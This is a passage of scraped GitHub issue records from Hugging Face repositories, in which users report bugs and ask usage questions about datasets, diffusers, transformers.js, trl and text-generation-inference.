time.time()\r\n\r\n # Load the dataset from Hugging Face Hub\r\n dataset = load_dataset(dataset_name)\r\n\r\n # Set the dataset format as torch\r\n dataset.set_format(type=\"torch\")\r\n\r\n # Perform an identity map\r\n dataset = dataset.map(lambda example: example, batched=True, batch_size=20)\r\n\r\n # End the timer\r\n end_time = time.time()\r\n\r\n # Print the time taken\r\n print(f\"Time taken: {end_time - start_time:.2f} seconds\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dataset_name = \"NightMachinery/hf_datasets_bug1\"\r\n print(f\"dataset_name: {dataset_name}\")\r\n main(dataset_name)\r\n```\r\n\r\n### Expected behavior\r\n\r\n_\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.13.1\r\n- Platform: Linux-5.15.0-76-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3", "url": "https://github.com/huggingface/datasets/issues/6104", "state": "open", "labels": [], "created_at": "2023-07-31T11:12:19Z", "updated_at": "2023-08-01T11:22:43Z", "comments": 1, "user": "NightMachinery" }, { "repo": "huggingface/diffusers", "number": 4382, "title": "HOW TO Overcoming the Influence of Seed and Enhancing the Role of Text Prompts", "body": "I fine-tuned a text2img model using Lora, based on the v1.5 version of stable diffusion. The results generated are very good.\r\nBut they can\u2019t be controlled. It seems that the generated results are more based on the seed. Changing the seed changes the image, And if I don\u2019t change the seed and only change the text prompt, the result doesn\u2019t change, or there are only very slight changes. \r\n1. 
How should I solve this problem?\r\n2. I would like to request a new feature that helps balance the influence between the seed and the prompt, as some questions are indeed sensitive to the seed.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4382", "state": "closed", "labels": [], "created_at": "2023-07-31T07:41:03Z", "updated_at": "2023-08-02T09:23:50Z", "user": "XiaoyuZhuang" }, { "repo": "huggingface/transformers.js", "number": 230, "title": "[Question] distiluse-base-multilingual-cased-v2 - wrong vector dimension (768 vs 512) in onnx version?", "body": "I was just playing around with the model [distiluse-base-multilingual-cased-v2](https://huggingface.co/sentence-transformers/distiluse-base-multilingual-cased-v2) and noticed that your onnx versions both (quantized and normal) produce embeddings with 768-dimensional vectors instead of 512.\r\n\r\nExample:\r\n\r\nindex.html\r\n\r\n```html\r\n<!-- Markup reconstructed; the original tags were stripped when the issue was rendered. -->\r\n<!DOCTYPE html>\r\n<html>\r\n  <head>\r\n    <title>Transformers.js Example</title>\r\n  </head>\r\n  <body>\r\n    <div>Transformers.js Example</div>\r\n    <script type=\"module\" src=\"main.js\"></script>\r\n  </body>\r\n</html>\r\n```\r\n\r\nmain.js\r\n\r\n```javascript\r\nimport { pipeline } from 'https://cdn.jsdelivr.net/npm/@xenova/transformers@2.4.4';\r\n\r\nasync function allocatePipeline() {\r\n    let pipe = await pipeline(\"feature-extraction\",\r\n        \"Xenova/distiluse-base-multilingual-cased-v2\");\r\n    let out = await pipe(\"test\", { pooling: 'mean', normalize: true });\r\n    console.log(out);\r\n}\r\nallocatePipeline();\r\n```\r\n\r\nThat gives me\r\n\r\n```\r\nProxy(s) {dims: Array(2), type: 'float32', data: Float32Array(768), size: 768}\r\n```\r\n\r\nHowever, the model page states\r\n\r\n> This is a [sentence-transformers](https://www.sbert.net/) model: It maps sentences & paragraphs to a 512 dimensional dense vector space and can be used for tasks like clustering or semantic search.\r\n\r\nAlso, I used the Python package\r\n\r\n```python\r\nfrom sentence_transformers import SentenceTransformer\r\nmodel = SentenceTransformer('sentence-transformers/distiluse-base-multilingual-cased-v2')\r\nmodel.encode(\"test\") \r\n```\r\n\r\nwhich gives me a correct 512-dimensional embedding.\r\n\r\nAm I missing some option here or overlooking the obvious?", "url": "https://github.com/huggingface/transformers.js/issues/230", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-30T16:49:36Z", "updated_at": "2024-10-18T13:30:12Z", "user": "do-me" }, { "repo": "huggingface/trl", "number": 592, "title": "How to load a custom-structure model?", "body": "Hello, when I run the following code, I am told that only `AutoModelForCausalLMWithValueHead` and `AutoModelForSeq2SeqLMWithValueHead` are supported. But these two structures seem to only be able to load the specified pre-trained models.\r\n`ppo_trainer = PPOTrainer(config, gen_model, gen_ref_model, tokenizer)`\r\n\r\nMy model is trained from T5, and its structure has changed. I would like to know how to load my model. Is it supported?\r\n", "url": "https://github.com/huggingface/trl/issues/592", "state": "closed", "labels": [], "created_at": "2023-07-30T15:42:18Z", "updated_at": "2023-08-31T11:00:56Z", "user": "estuday" }, { "repo": "huggingface/datasets", "number": 6099, "title": "How do I get \"amazon_us_reviews\"", "body": "### Feature request\n\nI have been trying to load 'amazon_us_reviews' but am unable to do so. 
\r\n\r\n`amazon_us_reviews = load_dataset('amazon_us_reviews')`\r\n`print(amazon_us_reviews)`\r\n\r\n\r\n> [ValueError: Config name is missing.\r\n\r\nPlease pick one among the available configs: ['Wireless_v1_00', 'Watches_v1_00', 'Video_Games_v1_00', 'Video_DVD_v1_00', 'Video_v1_00', 'Toys_v1_00', 'Tools_v1_00', 'Sports_v1_00', 'Software_v1_00', 'Shoes_v1_00', 'Pet_Products_v1_00', 'Personal_Care_Appliances_v1_00', 'PC_v1_00', 'Outdoors_v1_00', 'Office_Products_v1_00', 'Musical_Instruments_v1_00', 'Music_v1_00', 'Mobile_Electronics_v1_00', 'Mobile_Apps_v1_00', 'Major_Appliances_v1_00', 'Luggage_v1_00', 'Lawn_and_Garden_v1_00', 'Kitchen_v1_00', 'Jewelry_v1_00', 'Home_Improvement_v1_00', 'Home_Entertainment_v1_00', 'Home_v1_00', 'Health_Personal_Care_v1_00', 'Grocery_v1_00', 'Gift_Card_v1_00', 'Furniture_v1_00', 'Electronics_v1_00', 'Digital_Video_Games_v1_00', 'Digital_Video_Download_v1_00', 'Digital_Software_v1_00', 'Digital_Music_Purchase_v1_00', 'Digital_Ebook_Purchase_v1_00', 'Camera_v1_00', 'Books_v1_00', 'Beauty_v1_00', 'Baby_v1_00', 'Automotive_v1_00', 'Apparel_v1_00', 'Digital_Ebook_Purchase_v1_01', 'Books_v1_01', 'Books_v1_02']\r\nExample of usage:\r\n\t`load_dataset('amazon_us_reviews', 'Wireless_v1_00')`]\r\n\r\n__________________________________________________________________________\r\n`amazon_us_reviews = load_dataset('amazon_us_reviews', 'Watches_v1_00')\r\nprint(amazon_us_reviews)`\r\n\r\n**ERROR**\r\nGenerating train split: 0% | 0/960872 [00:00<?, ? examples/s]\r\n\r\n---> 1693 example = self.info.features.encode_example(record) if self.info.features is not None else record\r\n 1694 writer.write(example, key)\r\n\r\n11 frames\r\nKeyError: 'marketplace'\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nDatasetGenerationError Traceback (most recent call last)\r\n/usr/local/lib/python3.10/dist-packages/datasets/builder.py in _prepare_split_single(self, gen_kwargs, fpath, file_format, max_shard_size, split_info, check_duplicate_keys, job_id)\r\n 1710 if isinstance(e, SchemaInferenceError) and e.__context__ is not None:\r\n 1711 e = e.__context__\r\n-> 1712 raise DatasetGenerationError(\"An error occurred while generating the dataset\") from e\r\n 1713 \r\n 1714 yield job_id, True, (total_num_examples, total_num_bytes, writer._features, num_shards, shard_lengths)\r\n\r\nDatasetGenerationError: An error occurred while generating the dataset\n\n### Motivation\n\nThe dataset I'm using:\r\nhttps://huggingface.co/datasets/amazon_us_reviews\n\n### Your contribution\n\nWhat is the best way to load this data?", "url": "https://github.com/huggingface/datasets/issues/6099", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-07-30T11:02:17Z", "updated_at": "2023-08-21T05:08:08Z", "comments": 10, "user": "IqraBaluch" }, { "repo": "huggingface/trl", "number": 591, "title": "How to use SFTTrainer for multi-turn dialogues?", "body": "I want to use SFTTrainer to train on multi-turn dialogues. Does it apply to llama-2-7b-chat-hf? Is it the same as llama-2-7b-hf for instruction tuning?\r\nMy dataset consists of multi-turn dialogues. 
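One way to feed such data to SFTTrainer is a `formatting_func` that renders each example into the Llama-2 chat template shown next; a minimal sketch, where `system` and `turns` are hypothetical dataset field names, not a fixed schema:

```python
# Sketch: render one multi-turn example into a single training string for
# trl's SFTTrainer (passed via `formatting_func=format_dialogue`).
def format_dialogue(example):
    text = f"[INST] <<SYS>>\n{example['system']}\n<</SYS>>\n\n"
    for i, (user, assistant) in enumerate(example["turns"]):
        if i > 0:
            text += "[INST] "
        text += f"{user} [/INST] {assistant} "
    return text
```
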
\r\nThe prompt is:\r\n```\r\n[INST] <<SYS>>\r\n{{ system_prompt }}\r\n<</SYS>>\r\n\r\n{{ user_msg_1 }} [/INST] {{ model_answer_1 }} [INST] {{ user_msg_2 }} [/INST] {{ model_answer_2 }} [INST] {{ user_msg_3 }} [/INST]\r\n\r\n```", "url": "https://github.com/huggingface/trl/issues/591", "state": "closed", "labels": [], "created_at": "2023-07-30T05:47:40Z", "updated_at": "2023-08-01T06:21:04Z", "user": "moseshu" }, { "repo": "huggingface/transformers.js", "number": 228, "title": "[Question] Chaining automatic-speech recognition tasks sometimes produces weird output?", "body": "Hi! I'm using the automatic-speech recognition task with vanilla nodejs (20) for (almost) live transcription (after the person has stopped talking).\r\n\r\nThis is the setup I'm using as per the docs:\r\n\r\n```\r\nconst multilingual = true;\r\nconst model = \"base\";\r\nconst modelName = `Xenova/whisper-${model}${multilingual ? \"\" : \".en\"}`;\r\n\r\nconst transcriber = await pipeline(\"automatic-speech-recognition\", modelName);\r\n\r\nconst wav = new wavefile.WaveFile();\r\nwav.fromScratch(1, 48000, \"32f\", audioBuffer.getChannelData(0));\r\n\r\nwav.toSampleRate(16000); // Whisper expects audio with a sampling rate of 16000\r\n\r\nlet audioData = wav.getSamples();\r\nif (Array.isArray(audioData)) {\r\n    audioData = audioData[0];\r\n}\r\n\r\nlet output = await transcriber(audioData);\r\n```\r\n\r\nThis code almost works perfectly (I also verified the wav files by saving them locally).\r\n\r\nBut every once in a while the model seems to get stuck for a couple of seconds. I can't say if this is because I'm sending multiple requests to the pipe while there's still a task in progress (multiple speakers), or something else entirely. Sadly I don't think there's any documentation on whether the pipeline has a queue of some sort or whether it just mangles the data weirdly.\r\n\r\nThe output will look like this even though the sound-snippet only contains a single \"Ah...\":\r\n\r\n```\r\ntook 7.202248899996281s: Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... 
Ah...\r\n```\r\n\r\nor like this (no music was being played):\r\n\r\n```\r\ntook 6.9480034999996425s: [Music]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]\r\n```\r\n\r\nGeneration time is also much, much longer (normally under 1s with whisper-base; this is the main problem I'm facing).\r\n\r\nIs this a bug? I was thinking of working around the problem by canceling the operation if it takes longer than 2-3s, if that's possible, but that'd just be the laziest workaround.\r\n(something like `pipe.cancel();` or equivalent)\r\n\r\nOr alternatively implementing a queue myself, if it actually jumbles data when chaining tasks.\r\n\r\nThanks so much in advance for any suggestions! ", "url": "https://github.com/huggingface/transformers.js/issues/228", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-30T01:32:26Z", "updated_at": "2024-12-07T14:45:02Z", "user": "funiel" }, { "repo": "huggingface/diffusers", "number": 4363, "title": "How to properly load sd_xl_base_1.0_0.9vae.safetensors", "body": "### Describe the bug\n\nHi, how should I load sd_xl_base_1.0_0.9vae.safetensors, given the namespace is the same as the 1.0 one?\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nec2\n\n### Who can help?\n\n@sayakpaul @patrick", "url": "https://github.com/huggingface/diffusers/issues/4363", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-07-29T21:16:34Z", "updated_at": "2023-10-18T15:14:58Z", "user": "MaxTran96" }, { "repo": "huggingface/optimum-neuron", "number": 151, "title": "Any example of how to use with Accelerate?", "body": "All the examples seem to replace `Trainer`, but we are using `Accelerate`. Much appreciated! 
:)", "url": "https://github.com/huggingface/optimum-neuron/issues/151", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-07-29T05:51:20Z", "updated_at": "2024-12-02T08:05:47Z", "user": "jiangts" }, { "repo": "huggingface/transformers.js", "number": 226, "title": "voice recognition", "body": "@xenova hello bro i wish every things is good on you so i just wanna ask if we can recognize an audio file using his buffer ecxept wav extensions only i mean using mp3 file buffer or flac extension?\r\n```\r\n// Load audio data\r\nlet url = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/jfk.wav';\r\nlet buffer = Buffer.from(await fetch(url).then(x => x.arrayBuffer()))\r\n\r\n// Read .wav file and convert it to required format\r\nlet wav = new wavefile.WaveFile(buffer);\r\nwav.toBitDepth('32f'); // Pipeline expects input as a Float32Array\r\nwav.toSampleRate(16000); // Whisper expects audio with a sampling rate of 16000\r\nlet audioData = wav.getSamples();\r\nif (Array.isArray(audioData)) {\r\n // For this demo, if there are multiple channels for the audio file, we just select the first one.\r\n // In practice, you'd probably want to convert all channels to a single channel (e.g., stereo -> mono).\r\n audioData = audioData[0];\r\n}\r\n```\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/226", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-28T16:14:50Z", "updated_at": "2023-08-20T23:43:31Z", "user": "jedLahrim" }, { "repo": "huggingface/chat-ui", "number": 372, "title": "Can I add i18n support?", "body": "Would be great to support the standard i18n in frontend, we can contribute with it, do you see that it would be an accepted contribution?\r\n\r\nMaybe using this lib [kaisermann/svelte-i18n](https://github.com/kaisermann/svelte-i18n/blob/main/docs/Getting%20Started.md)", "url": "https://github.com/huggingface/chat-ui/issues/372", "state": "closed", "labels": [ "enhancement", "question", "front" ], "created_at": "2023-07-28T11:56:55Z", "updated_at": "2024-06-17T18:07:41Z", "user": "juancgalvis" }, { "repo": "huggingface/chat-ui", "number": 371, "title": "Improve the UI, to be flexible width?", "body": "The left sidebar is growing here, and I wished I could make it wider. 
Same goes for the middle part, which is centered; sometimes I have to scroll to the side to see the whole code block because the middle part has a left and right margin, which I can't control.\r\n\r\nIt would be great if we could set a percentage width for the left sidebar and the middle part in the user's profile.", "url": "https://github.com/huggingface/chat-ui/issues/371", "state": "open", "labels": [], "created_at": "2023-07-28T11:27:27Z", "updated_at": "2023-07-28T15:16:38Z", "comments": 2, "user": "tobiashochguertel" }, { "repo": "huggingface/accelerate", "number": 1786, "title": "Problem about how to save memory on 2 GPUs on one machine.", "body": "When I run my script on one GPU at batch_size 8, nothing bad happens; when I use accelerate launch to run my script on 2 GPUs at the same batch_size, both processes terminate because CUDA runs out of memory.\r\n\r\nHere is my config:\r\ncompute_environment: LOCAL_MACHINE\r\ndistributed_type: MULTI_GPU\r\ndowncast_bf16: 'no'\r\ndynamo_config:\r\n  dynamo_backend: INDUCTOR\r\ngpu_ids: all\r\nmachine_rank: 0\r\nmain_training_function: main\r\nmixed_precision: 'no'\r\nnum_machines: 1\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\r\n\r\nWhen I run my script normally on one GPU, memory utilization is about 23GB/24GB.\r\nDoes this config make my processes use more memory?", "url": "https://github.com/huggingface/accelerate/issues/1786", "state": "closed", "labels": [], "created_at": "2023-07-28T09:42:43Z", "updated_at": "2023-09-15T15:06:17Z", "user": "Kangkang625" }, { "repo": "huggingface/text-generation-inference", "number": 720, "title": "How to make sure the local tgi server's performance is ok", "body": "### Feature request\n\nHello, I just deployed the tgi server as documented, in a Docker container on a single A100, and ran a load test with bloom-7b1, but the performance falls well short of other inference servers, like vllm and fastertransformer, in the same environment and conditions. So, is there something like an official performance table for a beginner like me to make sure the performance is ok, or are there detailed instructions for me to check and set some options to improve throughput? Thanks a lot!\n\n### Motivation\n\nNone\n\n### Your contribution\n\nNone", "url": "https://github.com/huggingface/text-generation-inference/issues/720", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-07-28T07:57:18Z", "updated_at": "2024-04-25T01:58:42Z", "user": "lichangW" }, { "repo": "huggingface/transformers.js", "number": 224, "title": "[Question] Merge whisper-base.en main and output_attentions?", "body": "I can see there is an `output_attentions` branch on https://huggingface.co/Xenova/whisper-base.en/tree/main, and the difference from `main` seems to be that it can support `return_timestamps: 'word'`.\r\n\r\nIs there a plan/schedule to merge these two?\r\n\r\nOr are these two branches incompatible to merge? 
In that case, will both receive future updates?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/224", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-28T07:44:52Z", "updated_at": "2023-09-04T20:59:21Z", "user": "jozefchutka" }, { "repo": "huggingface/blog", "number": 1352, "title": "How to train the Autoformer?", "body": "Dear authors,\r\n\r\nI have read your blog at https://huggingface.co/blog/autoformer; it does a great job of explaining why the Transformer is better than DLinear.\r\nHowever, I am wondering how to train my own Autoformer instead of using a pretrained Autoformer.\r\n\r\nBest regards", "url": "https://github.com/huggingface/blog/issues/1352", "state": "open", "labels": [], "created_at": "2023-07-28T03:28:33Z", "updated_at": "2023-12-07T17:40:09Z", "user": "AppleMax1992" }, { "repo": "huggingface/text-generation-inference", "number": 718, "title": "How to make sure Flash and PagedAttention are running?", "body": "### System Info\n\nI am running the following for llamav2, and was wondering how I can make sure PagedAttention and FlashAttention are running. Is there any flag to be set, or are they enabled by default? \r\n\r\n\r\n```\r\ndocker run --gpus all --shm-size 1g -p $PORT:80 \\\r\n -v $PWD/data:/data \\\r\n -e HUGGING_FACE_HUB_TOKEN=$token \\\r\n ghcr.io/huggingface/text-generation-inference:0.9.3 \\\r\n --model-id $MODEL \\\r\n --sharded false \\\r\n --max-input-length 1024 \\\r\n --max-total-tokens 2048 \\\r\n --max-best-of 5 \\\r\n --max-concurrent-requests 5000 \\\r\n --max-batch-total-tokens $TOKENS\\\r\n --num-shard 4\r\n \r\n ```\r\n \n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nIt's more of a question, not a bug.\n\n### Expected behavior\n\nJust a docs clarification.", "url": "https://github.com/huggingface/text-generation-inference/issues/718", "state": "closed", "labels": [], "created_at": "2023-07-27T22:55:26Z", "updated_at": "2023-07-28T08:19:20Z", "user": "HamidShojanazeri" }, { "repo": "huggingface/text-generation-inference", "number": 716, "title": "How to load a private model in tgi in Docker, and the inference performance difference between loading from huggingface and loading from a local directory", "body": "Hi team, \r\n How do we load a private model in tgi in Docker, given the access issue? \r\n One solution is to pre-download the model, mount the model directory, and load it into tgi. However, I found a big inference performance gap between these two methods; could the team provide some hints on why that is? \r\n \r\n Reproduction steps: \r\n Model example: bigcode/santacoder\r\n 1. inference on 100 tokens via model-id bigcode/santacoder is 180ms\r\n Command: `docker run --gpus all --shm-size 1g -p 8080:80 -v /data:/data ghcr.io/huggingface/text-generation-inference:0.9.4 --model-id bigcode/santacoder --num-shard 1 --max-input-length 1000 --max-total-tokens 2000 --max-batch-total-tokens 4096 --max-concurrent-requests 1 --max-stop-sequences 20 --dtype float16 --trust-remote-code`\r\n\r\ntotal_time=\"158.787824ms\" validation_time=\"221.404µs\" queue_time=\"48.671µs\" inference_time=\"158.517849ms\" time_per_token=\"7.925892ms\"\r\n\r\n 2.1 first git clone the bigcode/santacoder repository by running `git lfs install && git clone https://huggingface.co/bigcode/santacoder `\r\n 2.2 run the Docker image, loading via model-id from the santacoder directory; inference on 100 tokens is 280ms. 
\r\nCommand: \r\n`docker run --gpus all -v santacoder_path:/model --shm-size 1g -p 8080:80 -v /data:/data ghcr.io/huggingface/text-generation-inference:0.9.4 --model-id /model --num-shard 1 --max-input-length 1000 --max-total-tokens 2000 --max-batch-total-tokens 4096 --max-concurrent-requests 1 --max-stop-sequences 20 --dtype float16 --trust-remote-code`\r\n\r\ntotal_time=\"329.15002ms\" validation_time=\"183.883µs\" queue_time=\"52.371µs\" inference_time=\"328.914016ms\" time_per_token=\"16.4457ms\" seed=\"None\"}:\r\n\r\nWhen loading from a local directory, it takes more time to shard, and there is a warning that the model does not support automatic max batch total tokens. Also, the output is garbage.\r\n\r\nTest command for querying the server: `curl 127.0.0.1:8080/generate -X POST -d '{\"inputs\":\"What is Deep Learning?\",\"parameters\":{\"max_new_tokens\":20}}' -H 'Content-Type: application/json'`\r\n I think there may be some additional steps to get better model performance, but I have not figured them out yet. Thanks for the help in advance!\r\nDocker image version: ghcr.io/huggingface/text-generation-inference:0.9.4\r\n \r\n ", "url": "https://github.com/huggingface/text-generation-inference/issues/716", "state": "closed", "labels": [], "created_at": "2023-07-27T21:12:38Z", "updated_at": "2023-07-28T07:12:53Z", "user": "zch-cc" }, { "repo": "huggingface/text-generation-inference", "number": 711, "title": "How can I tell what is wrong when connection refused happens?", "body": "Hi\r\n\r\nI tried launching Docker with the command below.\r\n\r\n```\r\ndocker run --rm --name tgi --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=1 -p 8080:80 ghcr.io/huggingface/text-generation-inference:0.9.3 --model-id decapoda-research/llama-7b-hf\r\n```\r\n\r\nAt this point, with netstat, I can see that port 8080 is already listening on the host:\r\ntcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN\r\n\r\nand with\r\n\r\n```\r\ncurl 127.0.0.1:8080/generate \\\r\n -X POST \\\r\n -d '{\"inputs\":\"What is Deep Learning?\",\"parameters\":{\"max_new_tokens\":20}}' \\\r\n -H 'Content-Type: application/json'\r\n```\r\n\r\n\r\nI get connection refused.\r\nIs there a debugging method to check what goes wrong here?\r\n\r\nThanks\r\n\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/711", "state": "closed", "labels": [], "created_at": "2023-07-27T13:59:48Z", "updated_at": "2023-07-27T14:10:46Z", "user": "leiwen83" }, { "repo": "huggingface/transformers", "number": 25138, "title": "How to return detected language using whisper with asr pipeline?", "body": "### System Info\n\n- `transformers` version: 4.31.0\r\n- Platform: Linux-5.15.0-67-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.1\r\n- Accelerate version: not installed\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1 (False)\r\n- Tensorflow version (GPU?): 2.11.0 (False)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: No\r\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@sanchit-gandhi, @Narsil\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nHello,\r\n\r\nI'm trying to use the ASR pipeline with Whisper, in order to detect 
an audio language and transcribe it. I get the transcribed audio successfully, but I have not found a way to return the detected language too.\r\nI searched the GitHub issues, and it seems this was added by [#21427](https://github.com/huggingface/transformers/pull/21427), but I don't know how to return the detected language. Here is my code:\r\n```\r\nfrom transformers import pipeline\r\nimport torch\r\n\r\nspeech_file = \"input.mp3\"\r\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\r\n\r\nwhisper = pipeline(\"automatic-speech-recognition\", max_new_tokens=448, model=\"openai/whisper-small\", device=device)\r\nwhisper_result = whisper(speech_file)\r\nprint(whisper_result)\r\n```\n\n### Expected behavior\n\nBe able to return the detected language.", "url": "https://github.com/huggingface/transformers/issues/25138", "state": "closed", "labels": [], "created_at": "2023-07-27T10:51:31Z", "updated_at": "2025-02-11T11:24:49Z", "user": "arso1er" }, { "repo": "huggingface/text-generation-inference", "number": 703, "title": "Is there an example of how to quantize a model (e.g. meta-llama/Llama-2-7b-chat-hf) using the prebuilt docker image (e.g. ghcr.io/huggingface/text-generation-inference:0.9.3)?", "body": "### System Info\r\n\r\n0.9.3\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\nNA\r\n\r\n### Expected behavior\r\n\r\nA command to quantize a model (e.g. meta-llama/Llama-2-7b-chat-hf) using the prebuilt docker image (e.g. ghcr.io/huggingface/text-generation-inference:0.9.3).\r\n\r\nAfter quantization, the model should be able to be loaded with `text-generation-inference --quantize gptq`.", "url": "https://github.com/huggingface/text-generation-inference/issues/703", "state": "closed", "labels": [], "created_at": "2023-07-27T01:08:54Z", "updated_at": "2023-07-28T21:41:46Z", "user": "taoari" }, { "repo": "huggingface/sentence-transformers", "number": 2262, "title": "How to pass more than sentence pairs to InputExamples for fine-tuning?", "body": "I have more information about each data point, such as language and contextual data, that could potentially (maybe) help with our task. The task is to generate sentence-similarity embeddings and labels. \r\n\r\nFor the time being, I was able to expand the InputExample code to get these features into the input. \r\n\r\n```\r\nTrain_data = ['sentence1','sentence2','textcategory1','label']\r\n\r\nTrain_examples = [InputExample(texts=[x[0],x[1],x[2]], label=x[3]) for x in Train_data]\r\n```\r\n\r\nThe `textcategory1` gets encoded as well, at the end of the input example, in the form `sentence1[0];sentence2[0];textcategory1[0]`, separated by `;`.\r\n\r\n1. How does this impact the overall input for a model, since it doesn't just see a sentence pair but more? \r\n2. Does the fine-tuning layer see the two sentences as pairs, or does it see a single input and a label?\r\n3. Even though it works, if this is not the correct way, how do I include this kind of token in the fine-tuning, i.e. use textcategory1 as a feature without messing with the embedding? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2262", "state": "open", "labels": [], "created_at": "2023-07-26T18:29:54Z", "updated_at": "2023-07-30T15:39:24Z", "user": "cyriltw" }, { "repo": "huggingface/trl", "number": 578, "title": "How to load a trained reward model? 
Different (random) results each time the model is loaded.", "body": "I trained a reward model using QLoRA and now I want to load it. I followed the instructions from this example from peft:\r\nhttps://github.com/huggingface/peft/blob/main/examples/sequence_classification/LoRA.ipynb\r\nThis leads me to the following code:\r\n```\r\nimport torch\r\nfrom peft import PeftModel, PeftConfig\r\nfrom transformers import AutoModelForSequenceClassification, AutoTokenizer\r\n\r\npeft_model_id = \"vincentmin/llama-2-7b-reward-oasst1\"\r\nconfig = PeftConfig.from_pretrained(peft_model_id)\r\nmodel = AutoModelForSequenceClassification.from_pretrained(\r\n config.base_model_name_or_path,\r\n num_labels=1,\r\n load_in_8bit=True,\r\n torch_dtype=torch.float16,\r\n)\r\nmodel = PeftModel.from_pretrained(model, peft_model_id)\r\ntokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path, use_auth_token=True)\r\nmodel.eval()\r\nwith torch.no_grad():\r\n reward = model(**tokenizer(\"hello world\", return_tensors='pt')).logits\r\nreward\r\n```\r\nIf I run this code twice in a row, including loading the model again, I get different results for `reward`. The model output should be deterministic. If I just calculate the reward with the same loaded model, the result is deterministic. Hence, I'm concluding that there are randomly initialised weights that are not correctly loaded with `PeftModel.from_pretrained`. If I try to test the model on the test data, I'm getting random (close to 50% accuracy) results, while the model reached accuracies of >70% during training.\r\n\r\nI trained the model using an adaptation of https://github.com/lvwerra/trl/blob/main/examples/scripts/reward_trainer.py. The resulting configuration is here https://huggingface.co/vincentmin/llama-2-7b-reward-oasst1/blob/main/adapter_config.json.\r\n\r\nHow are we advised to push and load our finetuned reward models to get deterministic results? I think the community would benefit from a documented example as a companion to `reward_trainer.py`.", "url": "https://github.com/huggingface/trl/issues/578", "state": "closed", "labels": [], "created_at": "2023-07-26T15:02:13Z", "updated_at": "2023-07-26T19:00:10Z", "user": "vincentmin" }, { "repo": "huggingface/datasets", "number": 6078, "title": "resume_download with streaming=True", "body": "### Describe the bug\n\nI used:\r\n```\r\ndataset = load_dataset(\r\n \"oscar-corpus/OSCAR-2201\",\r\n token=True,\r\n language=\"fr\",\r\n streaming=True,\r\n split=\"train\"\r\n)\r\n```\r\nUnfortunately, the server had a problem during the training process. 
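One partial workaround, sketched below under the assumption that your `datasets` release provides `IterableDataset.skip` (the `resume_step` value is a placeholder for whatever step counter you saved), is to fast-forward the stream past the examples you already consumed rather than resume the download itself:

```python
from datasets import load_dataset

# Placeholder: the step counter saved before the crash.
resume_step = 1_000_000

dataset = load_dataset(
    "oscar-corpus/OSCAR-2201",
    token=True,
    language="fr",
    streaming=True,
    split="train",
)
# skip() discards the first `resume_step` examples. Note the skipped
# records are still streamed over the network; they are just not yielded,
# so this saves processing time but not bandwidth.
dataset = dataset.skip(resume_step)
```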
